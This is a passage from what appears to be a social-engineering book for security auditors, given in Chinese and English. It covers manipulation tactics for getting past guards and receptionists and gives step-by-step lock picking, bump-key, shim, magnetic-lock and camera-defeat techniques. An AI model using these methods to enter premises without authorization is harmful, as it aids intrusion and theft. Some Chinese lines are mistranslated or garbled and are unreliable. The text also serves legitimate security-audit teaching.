找到一些积极的事情来提及可以让每个人都感到轻松,但必须平衡、有节制并且有品位。举个例子,当你走近一名保安时,在自我介绍之后,称赞她孩子的照片,比如说“哇,她真可爱;多大了,四五岁?我家里也有一个小女孩”,这样可以大大打开门。

Finding something positive to mention puts everyone at ease, but it must be balanced, controlled, and in good taste. Using the example of approaching a security guard, after introducing yourself, complimenting the picture of her children by saying something like, “Wow, she is really cute; how old, four or five? I have a little girl at home, too,” can go a long way toward opening the door.

 

假设,假设,假设

Assume, Assume, Assume

 

你可能听说过人们如何评价那些想当然的人,但在这种情况下,想当然是想当然。想当然是想当然。想当然是想当然, ...

You have probably heard what they say about people who assume, but in this case, assume it all. Assume that the target will act the way you want, assume he will answer the way you want, and assume he will grant you all your requests.

 

通过您提出的问题和做出的陈述来假设。

Assume with the questions you ask and the statements you make.

 

“当我从服务器机房回来时……”

“When I come back from the server room…”

 

这句话假设你属于那里,并且你已被授予访问权限。在前面提到的保安情况下,在称赞之后,也许可以提出后续建议:“当我检查完服务器回来时,我会给你看我女儿的照片。”

This statement assumes you belong there and you are already granted access. In the security guard situation mentioned earlier, after the compliment maybe offer a follow-up: “When I get back from checking the servers, I will show you a picture of my daughter.”

 

假设你想要的事情会发生也是一个强有力的理由,因为它会影响你的精神面貌。你必须有这样的精神面貌:你正在得到你想要的东西;这种信念体系将创造出一种新的肢体语言和面部表情,为你的借口提供依据。

Assuming that what you want will occur is a strong point, too, because it affects your mental outlook. You must have the mental outlook that you are getting what you came for; that belief system will create a new body language and facial expressions that will feed your pretext.

 

如果你预料到会失败,那你就会失败,或者至少会影响你的肢体语言和面部表情。如果你认为这笔交易已经完成,那么也会发生同样的情况。不过要提醒你,不要把这一步走得太远,否则你会变得傲慢。

If you go in expecting failure you will fail or at best it will affect your body language and facial expressions. If you have the mental outlook that this deal is done, the same will occur. A word of caution, though—don’t take this step so far you become arrogant.

 

例如,如果你心里想着“我当然胜券在握,因为我很了不起,是最棒的”,那么你的表现就会迅速让目标失望。

For example, going in thinking, “Of course I have this in the bag because I am amazing and the best,” can affect the way you come off and turn off the target quickly.

 

尝试不同的开场白

Try Different Opening Lines

 

以标准的为什么/什么/何时开始对话很常见,但尝试不同的方法,看看会发生什么。运营一家流行约会网站 ( www.okcupid.com ) 的研究小组收集了数据,显示了以非传统开场白开始的价值。

Starting a conversation with the standard why/what/when is common but try a different approach and see what happens. The research group that runs a popular dating site (www.okcupid.com) compiled data that shows the value of starting out with non-traditional openers.

 

还记得关于赞美的讨论吗?好吧,OkCupid 的伙计们发现,一开始就用“过分”的赞美会产生与人们想象的相反的效果。性感、美丽火辣等词语会给人带来糟糕的效果,而酷、棒迷人等词语则会有更好的效果。

Remember the discussion about compliments? Well, the OkCupid guys found that starting off with too “big” of a compliment had the reverse effect than what one would think. Words like sexy, beautiful, and hot had terrible effects on people, whereas words like cool, awesome, and fascinating had a better effect.

 

在通常的问候中,这些家伙发现说“嗨”,“嘿”和“你好”这样的话会让目标感到无聊和没有动力,而“最近怎么样?”,“有什么事?”,“你好”和“你好”则是强有力的开场白。

In usual greetings these guys found that saying things like “hi,” “hey,” and “hello” left the target feeling blah and unmotivated, whereas “How’s it going?,” “What’s up?,” “howdy,” and “hola” were strong openers to use.

 

当然,这些统计数据是关于约会的,但需要了解的一点是,人们对非传统的问候反应更好。

Of course, these stats are about dating, but the point to be learned is that people react better to nontraditional greetings.

 

同样地,在社会工程学的情况下,改变你的方法,你可能会注意到目标对信息的反应方式有所增加。

Similarly, in a social engineering situation, vary your approach and you may notice an increase in the way the target reacts to the message.

 

使用过去时

Use Past Tense

 

当你想解决任何你不希望目标重复的负面事情时,可以用过去时态。这种技巧将过去的消极态度和行为放在他的脑海中,为他提供新的、改进的“干净的记录”,让他可以在此基础上为你做好事。例如:

When you want to address anything negative that you do not want the target to repeat, put it in past tense. This technique puts the negative attitudes and actions in the past in his mind, presenting him with the new and improved “clean slate” on which to do good things for you. For example:

 

“当您我无法进去与史密斯先生见面时……”

“When you said I couldn’t get in to meet with Mr. Smith…”

 

而不是:“当您我不能进去见史密斯先生时……

as opposed to: “When you say I can’t get in to meet Mr. Smith….

 

只改变了动词时态,但效果却非常重要。它给人的印象是,否定陈述已经过去很久了,让我们继续讨论一些新的和改进的事情。它还让目标感觉到你觉得它已经过去了。

Only verb tense changed, but the effect is very important. It gives the impression that the negative statement is so far in the past, let’s move on to something new and improved. It also makes the target feel that you feel it is in the past.

 

寻找和摧毁

Seek and Destroy

 

识别、规划并计划如何处理任何破坏性或消极的态度和行为。想象一下,如果你的借口是成为一名可以进入服务器机房的技术支持人员。在之前的通话中,你知道每天上午 10 点会有一大群人出去抽烟。你认为这是一个好时机,因为人们进进出出。你做好了一切准备,但当你进入大楼时,接待员刚刚收到一些坏消息,情绪很混乱。你应该有一个计划来处理这种干扰。

Identify, map, and plan how you will handle any disruptive or negative attitudes and actions. Imagine if your pretext is to be a tech support guy who will gain access to the server room. In your previous calls you knew that every day at 10 am a large group goes out for a smoke break. You decide this is a good time as people are shuffling in and out. You go all prepared, but as you enter the building the receptionist has just received some bad news and is an emotional mess. You should have a plan for handling this disruption.

 

如果你等到第一次听到潜在的谈话障碍或破坏性影响时才考虑如何处理它们,你很可能无法处理它们。那么,这提出了一个有趣的想法。你必须坐下来,像目标一样思考:他会提出什么反对意见?当一个他不认识的人打电话或接近他时,他会说什么?他会提出什么反对意见?他会表现出什么样的态度?仔细考虑这些事情可以帮助你为这些潜在问题制定一个应对计划。

If you wait to think about how you will handle potential conversation stoppers, or disruptive influences, until the first time you hear them you will most likely fail to handle them. That presents an interesting thought then. You have to sit back and think like the target: what objections would he raise? When a person he does not know calls or approaches him, what might he say? What objections might he raise? What attitudes would he portray? Thinking through these things can help you to make a game plan for these potential problems.

 

写下你的想法和目标的潜在反对意见,然后进行角色扮演。让你的配偶或朋友扮演凶狠的守门人或保安。当然,他或她不能模仿面部表情等元素。但你可以给他或她一份简短的谈话终结者清单,供他们选择,以测试你的反击能力。

Write down your thoughts and the target’s potential objections and then role play. Have your spouse or friend play the mean gatekeeper or security guard. Of course, he or she cannot imitate elements such as facial expressions and so on. But you can give him or her a small list of conversation stoppers to choose from to test your comeback.

 

练习直到你感觉舒服,但不要照本宣科。记住,反击的结构不要太死板,否则你根本无法改变它。

Practice until you feel comfortable, but not scripted. Remember the comeback is not to be structured so stiffly that you cannot alter it at all.

 

积极的操纵可以对目标产生非常强烈的影响。这不仅不会让他感到被侵犯,而且如果做得正确,他还会感到有成就感,就好像他今天做了一件好事。

Positive manipulation can have a very strong effect on the target. Not only does it not leave him feeling violated but if done properly he can feel accomplished and as if he did something good for the day.

 

概括

Summary

 

操纵是社会工程学和影响力的重要组成部分。本章涵盖了人类行为领域,这些领域涵盖了世界上一些最聪明的人数十年的研究成果。

Manipulation is a key component to social engineering as well as influence. This chapter covered areas of human behavior that spanned decades of research from some of the smartest minds on earth.

 

对于操纵他人的想法,常见的反应可能是:

Common reactions to the thought of manipulating others might be:

 
 
     
  • “我不想操纵别人。”
  • “I don’t want to manipulate people.”
  •  
     
  • “学习这个感觉不对。”
  • “It feels wrong to be learning this.”
  •  
 

这些评论代表了大多数人听到“操纵”一词时的想法。希望你现在相信操纵并不总是一种黑暗艺术,它可以被用于善事。

These comments represent the way most people think when they hear the word manipulation. Hopefully, you’re now convinced that manipulation isn’t always a dark art and can be used for good.

 

当今一些最杰出的心理学家和研究人员已经对影响力的世界进行了剖析、研究和分析。这项研究是我研究的基础,以开发本章中的信息。例如,关于框架的部分可以真正改变你与人互动的方式,而互惠的概念可以塑造你作为社会工程师的思维方式以及你如何利用影响力。然而,影响力是一个如此令人惊叹的话题,以至于有大量书籍专门讨论这个话题。

The world of influence has been dissected, researched, and analyzed by some of today’s brightest psychologists and researchers. This research served as the basis of my own research to develop the information in this chapter. The section on framing, for instance, can truly change the way you interact with people, and the concept of reciprocation can shape your thinking as a social engineer and how you utilize influence. Influence is such an amazing topic, though, that volumes of books are devoted to that topic alone.

 

了解是什么触发了一个人,促使他想要做某种行为,然后让该行为在目标群体看来是好的——这就是影响力。

Understanding what triggers a person to motivate him to want to do a certain action and then having that action seem good to the target—that is the power of influence.

 

本章阐明了人们行为的科学和心理学原理,并阐明了社会工程师如何利用影响力。

This chapter illuminated the science and psychology of what makes people tick, and clarified how influence is used by social engineers.

 

请记住,影响和说服的艺术是让别人按照希望的方式去做、做出反应、思考或相信的过程。

Remember, influence and the art of persuasion are the processes of getting someone else to want to do, react, think, or believe in the way you want them to.

 

这句话的力量超越了社会工程和操纵。它是改变任何框架的关键,是打开任何操纵之门的关键,也是成为影响力大师的途径。

The power in this statement transcends social engineering and manipulation. It is the key to altering any frame, the key to unlocking any door of manipulation, and the pathway to becoming a master at influence.

 

社会工程师还使用许多物理工具,其中一些看起来像是从詹姆斯邦德电影里走出来的,我们将在下一章中讨论它们。

Social engineers also use many physical tools, some of which might look like they were taken out of a page of a James Bond movie, and they are discussed in the next chapter.

 

第7章

Chapter 7

 

社会工程师的工具

The Tools of the Social Engineer

 

人是使用工具的动物。没有工具,人就一无是处;有了工具,人就拥有了一切。

Man is a tool-using animal. Without tools he is nothing, with tools he is all.

 

—托马斯·卡莱尔

—Thomas Carlyle

 

在社会工程学中,拥有一套像样的工具集可以决定社会工程学的成败。此外,成功与失败之间的差距不仅在于拥有工具,还在于拥有如何使用它们的知识。

When it comes to social engineering having a decent toolset can make or break the ability of the social engineer to be successful. In addition, it is not so much having the tools but also possessing the knowledge on how to use them that can bridge the gap between success and failure.

 

本章讨论了实物工具、电话工具和基于软件的工具之间的区别。请注意,仅仅拥有最昂贵或最好的工具并不能使您成为社会工程师。相反,工具可以增强您的安全实践,就像正确的调料搭配可以增加一顿饭的美味一样——太多或太少都会使饭菜变得平淡无味或过于浓烈。您不想看起来像戴着工具腰带的蝙蝠侠去参加社会工程活动,也不想在没有合适的工具集的情况下出现在目标的前门。

This chapter discusses the differences between physical tools, phone tools, and software-based tools. Note that simply possessing the most expensive or best tools will not make you a social engineer. Instead, tools can enhance your security practice the way that the right blend of spices can augment a meal—too much or too little can make the meal bland or overpowering. You do not want to look like Batman wearing a utility belt going into a social engineering gig, nor do you want to be at the target’s front door without the proper toolset to gain access.

 

社会工程师的工具类别可能非常庞大,但本书并不是想成为一本关于如何撬锁或伪造电话号码的手册。相反,它试图为您提供足够的信息,以决定哪些工具可以增强您的实践。

The social engineer’s tools category has the potential to be huge, but this book isn’t trying to become a manual on how to pick locks or spoof a phone number. Instead it is an attempt to give you enough information to decide what tools would augment your practice.

 

本章的第一部分“物理工具”重点介绍了撬锁工具、垫片和摄像头等。市场上出现了一些新的、令人兴奋的工具,这些工具会让普通的社会工程师感觉自己就像詹姆斯·邦德一样。本章介绍了其中一些工具及其使用方法,甚至还展示了一些工具的图片。此外,本章还提供了有关在社会工程攻击中使用电话欺骗的一些信息,继续讨论市场上一些最好的基于软件的信息收集工具,最后讨论密码分析工具。

The first section of this chapter, “Physical Tools,” focuses on things like lock picks, shims, and cameras. Some new and exciting tools are on the market that will make the average social engineer feel like James Bond. This chapter covers some of these tools and how to use them, and even shows some pictures of the tools. In addition, this chapter provides some information on using phone spoofing in a social engineering attack, continues with a discussion of some of the best software-based information-gathering tools on the market, then ends with a discussion about password profiling tools.

 

物理工具

Physical Tools

 

物理安全包括公司或个人为保持安全而采取的措施,这些措施不涉及计算机。它通常涉及锁、运动摄像机、窗户传感器等。了解物理安全及其工作原理是成为一名优秀社交工程师的一部分。您不必成为这些设备的工程师,但清楚地了解目标所采用的安全机制可以帮助您克服可能阻碍成功进行社交工程审计的障碍。

Physical security is comprised of the measures that companies or people take to remain secure that do not involve a computer. It often involves locks, motion cameras, window sensors, and the like. Understanding physical security and how it works is part of being a good social engineer. You don’t have to be an engineer of these devices but having a clear understanding of the security mechanisms a target has in place can help you overcome obstacles that might stand in the way of a successful social engineering audit.

 

撬锁工具

Lock Picks

 

在讨论撬锁的话题之前,您必须了解一些锁的工作原理。

Before getting into the topic of picking locks you have to know a bit about how a lock works.

 

图 7-1显示了简单锁的非常粗略的图像。

Figure 7-1 shows a very rough image of a simple lock.

 

图 7-1:锁的简单视图。

Figure 7-1: A simple view of a lock.

 
f0701.eps
 

锁的工作原理基本上是,它有由钥匙操纵的弹子。钥匙将弹子和上部弹子向上推,当它们对齐时,钥匙就可以转动并解锁门、服务器机房、柜子等。

Basically the way a lock works is that it has tumblers that are manipulated by the key. The key pushes up the tumblers and upper pins, and when they line up it allows the key to turn and unlock the door, server room, cabinet, and so on.

 

撬锁工具模拟钥匙将所有弹子逐一移到正确位置,使锁可以自由转动并打开门。撬锁需要两种主要工具:撬锁工具和扭力扳手。

A lock pick simulates the key in moving all the pins into the correct position one by one, allowing the lock to turn freely and open the door. You need two main tools to pick a lock: picks and a tension wrench.

 

撬锁器是一长条金属片,末端弯曲,类似牙医的工具。撬锁器伸入锁内,上下移动弹子,直到弹子处于正确位置。

Picks are long pieces of metal that curve at the end, similar to a dentist’s tool. They reach inside the lock and move the pins up and down until they are in the right position.

 

扭力扳手是一种小型扁平的金属装置,可让您在使用撬锁工具时对锁施加压力。

Tension wrenches are small flat metal devices that allow you to put pressure on the lock while using the pick.

 

耙子看起来像镐,但用来在锁上“耙”动,试图抓住所有的弹子。许多开锁者认为耙子进出锁的快速动作很有吸引力,因为它通常可以快速打开大多数锁。

Rakes look like picks but are used in a “raking” motion over the lock in an attempt to catch all the pins. It is the quick motion of moving the rake in and out of the lock that many lock pickers find attractive because it usually makes quick work of most locks.

 

要撬锁,请按照下列步骤操作:

To pick a lock, follow these steps:

 

1.将扭力扳手插入锁孔,然后按照转动钥匙的方向转动。这里真正的技巧是知道要增加多少张力——使用太多或太少,弹子就不会落入到位,从而允许锁转动。提供恰到好处的张力会产生一个小凸缘,使插塞偏移到足以抓住弹子轴。

2.插入撬锁工具,用它逐个抬起插销,直到感觉插销锁定到位。当上部插销落入到位时,您会听到轻微的咔嗒声。当您将所有插销都放到位后,插销将自由旋转,这样您就撬开了锁。

1. Insert the tension wrench into the keyhole and turn it in the same direction you would turn the key. The real skill here is knowing how much tension to add—use too much or too little, and the pins won’t fall into place, thus allowing the lock to turn. Providing just the right amount of tension creates a small ledge that offsets the plug enough to catch the pin shafts.

2. Insert the pick and use it to lift the pins one by one until you feel them lock in place. You can hear a slight click when an upper pin falls into position. When you get all the pins into position the plug will rotate freely, and you will have picked the lock.

 

以上是 2 美元的撬锁之旅,但还只是冰山一角。如果您想了解撬锁方面的一些重要信息,请访问以下任何网站:

The preceding is the $2 tour of lock picking and barely scratches its surface. If you want some great information on lock picking visit any of the following websites:

 
 
 

这些只是众多致力于开锁教育的网站中的一小部分。作为一名社会工程师,花时间练习开锁是明智的。当你在服务器机柜、办公桌抽屉或其他包含重要信息的上锁障碍物前时,随身携带一套小型开锁工具可以救你一命。

These are just a few of the many sites devoted to lock-picking education. As a social engineer, spending time practicing picking locks is wise. Carrying a small lock-pick set with you can be a lifesaver when you’re in front of a server cabinet, desk drawer, or other locked obstacle containing juicy information.

 

撬锁工具组可以像图 7-2所示的一样小,只有一张普通名片那么大。

Lock pick sets can be as small as those shown in Figure 7-2, which are the size of a normal business card.

 

图 7-2:这套名片大小的撬锁工具可以轻松放入钱包或钱袋中。

Figure 7-2: This business card–sized lock-pick set fits easily into a wallet or purse.

 
f0702.tif
 

它们也可能更笨重,如图7-37-4所示。

They can also be bulkier, as shown in Figures 7-3 and 7-4.

 

图 7-3:这套工具大约和一把小刀一样大小。

Figure 7-3: This set is about the size of a pocketknife.

 
f0703.tif
 

图 7-4:这套撬锁工具体积较大,但包含了您需要的一切。

Figure 7-4: This lock-pick set is bulkier but contains everything you would need.

 
f0704.tif
 

一个好的建议是,不要让你第一次玩撬锁工具时处于危急情况。就我个人而言,我出去买了几个不同尺寸的 Master 挂锁。在我能够成功撬开所有挂锁后,我又买了一套练习锁,类似于图 7-5中所示的锁。这些锁有许多不同的弹子类型。锁包含不同的弹子类型,这会增加撬锁的难度。拥有不同弹子类型和尺寸的练习锁可以最大限度地提高练习的效率。

A good recommendation is to not let the first time you play with a lock pick be in a critical situation. Personally, I went out and bought a few Master padlocks of differing sizes. After I was able to successfully pick all of them I then bought a set of practice locks, something like those shown in Figure 7-5. These come in many different pin types. Locks contain varying pin types, which can add to the level of difficulty in picking. Having practice locks of varying pin types and sizes maximizes the effectiveness of your practice sessions.

 

图 7-5:这些透明的锁可以让你看到自己的表现。

Figure 7-5: These see-through locks allow you to see how you are doing.

 
f0705.tif
 

我甚至在不同的会议上看到了一些非常不错的设置,这些设置非常适合学习,比如自制的锁墙。当然,当你收集目标情报时,拍照或在脑海中记下可能阻碍你成功之路的锁的类型、品牌和型号是个好主意。了解这些信息可以帮助你在进行社会工程尝试之前做好准备。

I have even seen some very nice setups at different conferences that would be excellent for learning, like a homemade lock wall. Of course, as you gather intel on your target, taking pictures or just making mental notes of the types, makes, and models of the locks that might block your path to success is a good idea. Knowing this information can help you prepare before you engage in your social engineering attempt.

 

实际用途

Practical Usage

 

电影和电视中对撬锁的描述是这样的:只要将撬锁器插入,几秒钟后门就会神奇地打开。当然,有些人撬锁技术很好,但大多数人会慢慢地取得成功,经过无数次施加过大的力,感到沮丧,最后学会如何真正地撬开锁。撬锁本身就是一种才能。这就是你使用一个耙子工具,轻轻地将耙子滑入和滑出锁,同时对扭力扳手施加轻微的压力。这种技术适用于多种类型的锁,使人们能够用这种简单的方法“撬开”它们。学会有效地撬锁可以让社会工程师学到很多关于如何正确使用扭力扳手以及锁被撬时的感觉。

Lock picking in the movies and on TV is portrayed such that one just puts the lock pick in and a few seconds later the door magically opens. Sure, some people pick locks that well, but the majority of people will find success slowly, after countless times applying too much tension, getting frustrated, and then at last learning how to truly rake and pick a lock. Raking is a talent in itself. This is where you use a rake tool and gently slide the rake in and out of the lock while applying light pressure to the tension wrench. This technique works on many types of locks, enabling them to be “picked” using this simple method. Learning to rake efficiently teaches a social engineer a lot about how to use the tension wrench properly and what it feels like when the lock is picked.

 

许多公司开始使用 RFID、磁性徽章卡或其他类型的电子门禁,这可能会让人认为撬锁工具已经过时了。撬锁工具并没有过时,撬锁技能也没有过时。这是一种很好的技能,可以在渗透测试中拯救你。

Many companies are starting to use RFID, magnetic badge cards, or other types of electronic access, which may lead one to believe that lock picks are obsolete. They are not, and neither is the skill of lock picking. It is a good skill to have that can save you in a pentest.

 

以下是随身携带开锁工具的好处的一个例子:在一次交战中,我遇到了一个无法通过社交工程攻克的障碍——一扇门。我拿出一套可靠的口袋大小的开锁工具,使用耙子方法,在大约 30 秒内就打开了门。许多社交工程师都有这样的故事,对锁有一点了解,拥有合适的工具意味着最终的成功。公司经常会花费数千甚至数百万美元购买硬件、防火墙、IDS 系统和其他保护方法,然后把它们都放在一个房间里,用廉价的玻璃和一把 20 美元的锁保护它。

Here is an example of the benefit of carrying lock picks with you: On one engagement I came upon an obstacle that could not be social engineered—a door. Pulling out a trusty pocket-sized lock pick set and using the raking method, I gained access in about 30 seconds. Many social engineers have stories like this one, where understanding a little about locks and having the right tools meant success in the end. It is too often the case that companies will spend thousands or even millions of dollars on their hardware, firewalls, IDS systems, and other protection methods, and then put them all in a room with cheap glass and a $20 lock protecting it.

 

练习是必不可少的,因为撬锁总是存在被发现或被抓住的风险。你必须快速撬锁以降低这种风险。有些地方会安装摄像头来抓拍正在撬锁的人,但最终,除非摄像头由真人操作,否则它只会记录下有人闯入并窃取服务器的过程。

Practice is essential because picking a lock always carries the risk of being seen or caught. You must be quick about picking a lock to reduce that risk. Some places install cameras to catch people in the act, but in the end, unless the camera is manned by a live person, it will only record a person breaking in and stealing the servers.

 

此外,使用简单的方法(例如将 LED 灯直接照射到镜头或戴帽子或头罩遮住脸)很容易使许多相机失去作用。

In addition, many cameras can be easily rendered useless by using simplistic methods of LED lights shined right into the lens or wearing a hat or hood to cover your face.

 

撬开磁力锁和电子锁

Picking Magnetic and Electronic Locks

 

磁力锁越来越受欢迎,因为它们运行成本低廉,并且提供一定程度的安全性,因为它们不是可以被撬开的传统锁。磁力锁有各种形状、尺寸和强度。然而,磁力锁也存在一定程度的不安全性:如果断电,大多数磁力锁都会松开,从而解锁门。当然,这是在锁没有连接到备用电源的情况下。

Magnetic locks have become more popular because they are very inexpensive to run and provide a certain level of security because they are not a traditional lock that can be picked. Magnetic locks come in all shapes, sizes, and strengths. Magnetic locks, however, also offer a level of insecurity: If the power goes out most magnetic locks will disengage, unlocking the door. This is, of course, if the lock is not hooked up to a backup power source.

 

约翰尼·朗是世界著名的社交工程师和黑客,他创建了 Google 黑客数据库,也是《No Tech Hacking 》一书的作者。他讲述了他如何使用衣架和毛巾绕过磁力锁的故事。他注意到,锁是根据员工走向门口的动作解锁的。他还注意到门上有一个缝隙,这个缝隙大到可以将挂在衣架上的布塞进去。挥动布就可以打开锁,让他进门。

Johnny Long, world-renowned social engineer and hacker who created the Google Hacking Database and author of No Tech Hacking, tells a story of a how he bypassed a magnetic lock using a coat hanger and washcloth. He noticed the locks were disengaged based on the motion of an employee walking toward the door. He also noticed a gap in the doors that was large enough to slide a cloth attached to a hanger through. Waving the cloth around released the lock and gave him access.

 

我最近有机会测试了这项技术。果然,我花了一点力气,测试了不同长度的衣架,不到两分钟就打开了。最让我惊讶的是,尽管花了这么多钱购买了专业的商用级锁和带有防弹玻璃窗的金属门,还为锁配备了备用电源,如果断电,锁会自动上锁,但这一切都被一个衣架和一块抹布挡住了。

I recently had a chance to test out this technique. Sure enough with a little effort and testing different lengths of hanger, I gained access in under two minutes. What amazed me the most about this is that despite how much money was spent on the professional, commercial-grade lock and metal doors with bulletproof glass windows in them, with backup power sources to the locks and autolocking bolt locks if the power goes out, it was all thwarted by a hanger with a rag.

 

当然,还有更高科技的撬锁方法。有些人发明了RFID 克隆机,这是一种小型设备,可以捕获并重放解锁门的 RFID 代码。还有机器可以复制磁性钥匙卡。

Of course there are higher-tech ways of picking these locks. Some have created RFID cloners, a small device that can capture then replay the RFID code unlocking the doors. There are machines to copy magnetic key cards as well.

 

各类开锁工具

Miscellaneous Lock-Picking Tools

 

除了扭力扳手和镐之外,社会工程师可能还想使用其他工具(如推刀、撞匙和挂锁垫片)来获取物理访问权限。如果能熟练使用其中某些工具,物理访问权限的获取将变得轻而易举。

In addition to tension wrenches and picks, a social engineer may want to employ some other tools, such as shove knives, bump keys, and padlock shims, to gain physical access. Some of these tools, when mastered, can make the job of physical access effortless.

 

推刀

Shove Knives

 

如图 7-6所示,推刀被誉为进入办公室门或任何带有旋钮锁的门(如服务器机房或办公室门)的最快方法。基本上,这种刀可以滑入可以释放闩锁的位置而不会损坏门。

The shove knife, shown in Figure 7-6, is hailed as the quickest way to gain access to office doors or any door with a knob lock, such as server rooms or office doors. Basically this knife can slip into a position where it can release the latch without damaging the door.

 

图 7-6:典型的推刀。

Figure 7-6: A typical shove knife.

 
f0706.tif
 

撞击键

Bump Keys

 

撞匙已经存在很久了,但由于它们被用于犯罪而受到新闻的广泛关注。撞匙是经过特殊设计的钥匙,使用者可以用轻微的力量将钥匙“撞”入锁中,如果操作正确,所有销钉都会正确对齐,并且可以在不损坏锁的情况下转动插头。基本技巧是将钥匙放入锁内并将其拉出一两个槽口;然后轻轻拉动钥匙,使用螺丝刀或其他小物体用轻微的力量将钥匙“撞”入锁中。此动作将销钉推入正确位置,然后插头就可以转动了。图 7-7显示了撞匙。

Bump keys have been around for ages, but have been getting a lot of notice in the news because they have been used in crimes. Bump keys are specially designed keys that allow the user to “bump” the key into the lock with light force that when done right, puts all the pins in proper alignment and allows the plug to be turned without damaging the lock. The basic technique is that you put the key inside the lock and pull it out one or two notches; then you put light tension on the key and use a screwdriver or other small object to “bump” the key into the lock using light force. This action forces the pins into the proper position and then allows the plug to turn. Figure 7-7 shows a bump key.

 

图 7-7:典型的门撞匙。

Figure 7-7: A typical bump key for a door.

 
f0707.tif
 

挂锁垫片

Padlock Shims

 

垫片是一小块薄金属,可滑入挂锁底座,用于释放锁定装置。垫片被推入锁杆底部,将锁定装置与锁杆分离,从而解锁挂锁。如图7-8所示

A shim is a small piece of thin metal that is slid into the base of the padlock and used to release the locking mechanism. The shim is shoved in at the base of lock shaft, separating the locking mechanism from the shaft and unlocking the padlock. This is shown in Figure 7-8.

 

图 7-8:垫片的工作原理。

Figure 7-8: How a shim works.

 
f0708.eps
 

图 7-9展示了专业级垫片,但您也可以用铝罐制作一对。

Figure 7-9 shows professional-grade shims but you can also make a pair out of an aluminum can.

 

最近的一些故事 ( www.youtube.com/watch?v=7INIRLe7x0Y ) 展示了绕过带有链锁的酒店或其他门是多么容易。这个特别的视频展示了攻击者如何将橡皮筋绑在锁上,并利用橡皮筋的自然张力让链条滑落。此外,麻省理工学院还有一本免费分发的关于撬锁的指南 ( www.lysator.liu.se/mit-guide/MITLockGuide.pdf ),比本章中的简介要深入得多。

Some recent stories (www.youtube.com/watch?v=7INIRLe7x0Y) show how easy it is to bypass a hotel or other door with a chain lock. This particular video shows how an attacker can tie a rubber band around the lock and, using the natural tension of the rubber band, get the chain to slide right off. As well, MIT has a freely distributed guide (www.lysator.liu.se/mit-guide/MITLockGuide.pdf) on lock picking that is much more in-depth than the brief introduction included in this chapter.

 

图 7-9:专业制作的垫片。

Figure 7-9: Professionally made shims.

 
f0709.tif
 

您可能想知道是否存在不可能或至少难以撬开的锁。防撞 BiLock ( www.wholesalelocks.com/bump-proof-bilock-ult-360.html ) 就是这样一种锁。它的两个锁芯使它几乎不可能被轻易撞开或撬开。

You might be wondering whether locks that are impossible, or at least hard to pick, exist. The Bump Proof BiLock (www.wholesalelocks.com/bump-proof-bilock-ult-360.html) is just such a lock. Its two cylinders make it near-impossible to bump or pick easily.

 

在我的职业生涯中,我看到的问题之一不是锁的选择,而是支持锁的安全性。很多时候,公司会购买重型锁,需要生物识别和钥匙才能进入服务器机房,但门旁边有一扇小小的单层玻璃窗。那时谁还需要撬锁工具呢?小偷会毫不费力地打破玻璃进入。

One of the problems I have seen in my career is not the lock choice but rather the security supporting the lock. Very often, a company will buy a heavy-duty lock that requires biometrics and key access to get to the server room, but right next to the door is a small, single-paned glass window. Who needs a lock pick then? A thief will break the glass and gain access without much effort.

 

这个故事的寓意是,单靠一把锁并不能保证你的安全。安全是一种心态,而不是简单的硬件。

The moral of the story is that a lock alone won’t make you secure. Security is a mindset, not a simple piece of hardware.

 

并非每个社会工程师都必须是专业的锁匠,但是,掌握一些有关锁的基本知识以及一些撬锁经验可能会决定社会工程学的成败。

Not every social engineer must be an expert locksmith, but having some basic knowledge on how locks work and a bit of experience picking locks might make the difference between a social engineering success and failure.

 

这次讨论只是触及了社会工程师可以使用的开锁工具这一话题的表面。对于社会工程师来说,另一个非常有价值的工具集是录音设备,如下一节所述。

This discussion just scratched the surface of the topic of the lock-picking tools a social engineer can use. One of the other toolsets that is invaluable for a social engineer is recording devices, as discussed in the next section.

 

相机和录音设备

Cameras and Recording Devices

 

摄像机和录音设备看起来太“偷窥狂”了,以至于经常有人问,“为什么?为什么在 SE 演出中使用隐藏摄像机和隐蔽录音设备?”好问题。答案很简单,分为两部分:为了证明和保护。

Cameras and recording devices seem so “peeping Tom-ish” that many times the question arises, “Why? Why use hidden cameras and covert recording devices in an SE gig?” Good question. It has a simple two-part answer: for proof and protection.

 

让我们讨论一下证据的概念。如前所述,社会工程审计就是对人们进行测试。它试图帮助公司修补人力基础设施,使其更加安全。不幸的是,恶意社会工程师在实施他们的行为时也使用同样的原则。许多人不愿意承认自己被骗,除非他们看到证据或他们的同事被骗。通过简单的社会工程攻击被欺骗的尴尬或对雇主报复的恐惧可能导致人们说这种事从未发生过。录音设备可以提供这种证据,但它也可以用来培训您作为审计员和您的客户注意什么。

Let’s discuss the concept of proof. As already mentioned, a social engineering audit is where you are testing people. It is trying to help a company patch the human infrastructure to be more secure. Unfortunately, these same principles are used when malicious social engineers do their deeds too. Many people are reluctant to admit they can be duped unless they see the proof or one of their colleagues being duped. The embarrassment from being tricked through a simple social engineering attack or the fear of employer repercussions can cause people to say it never happened. A recording device can provide that proof, but it can also be used to train both you as an auditor and your client on what to watch for.

 

您绝不能使用这些设备来让员工陷入麻烦或让其难堪。但是,您从这些设备中获得的信息可以成为事后很好的学习工具,可以向员工展示谁上当了社交工程师的借口,以及他们是如何上当的。拥有成功黑客攻击的证据可以在很大程度上教育公司及其员工如何应对恶意社交工程攻击——换句话说,如何注意然后避免或减轻这些攻击。

You must never use these devices with the intent of getting an employee in trouble or to embarrass him or her. However, the information you get from these devices provides a great learning tool afterward for showing the staff who fell for the social engineer’s pretext and how. Having proof of a successful hack can go a long way toward educating the company and its staff on how they should react to malicious social engineering attempts—in other words, how to notice and then either avoid or mitigate these attacks.

 

在 SE 演出中使用录音设备的第二个原因是为了保护,主要是为了保护专业的社交工程师。为什么?因为不可能看到每个微表情、面部动作和以后可以使用的小细节。用相机捕捉这些信息可以让你进行分析,从而获得攻击所需的所有细节。它可以提供保护,因为你有事件的记录来证明做了什么和没做什么,但它也不会把所有事情都留给你对情况的记忆。它也是分析失败或成功的 SE 尝试的一个很好的教育工具。

The second reason to use recording devices in an SE gig is for protection, mainly for the professional social engineers. Why? Seeing every microexpression, facial gesture, and little detail that you can use later on is impossible. Capturing this information on camera gives you something to analyze so you do get all the details needed for the attack. It can provide protection in that you have a recording of the events to prove what was and was not done, but also in that it doesn’t leave everything to your memory of the situation. It also is a good educational tool for analyzing failed or successful SE attempts.

 

这一原则在执法中得到运用。警察和联邦探员记录他们的交通拦截、面谈和审讯,以保护、教育和在法庭上使用证据。

This principle is used in law enforcement. Police and federal agents record their traffic stops, interviews, and interrogations for protection, education, and proof to be used in court.

 

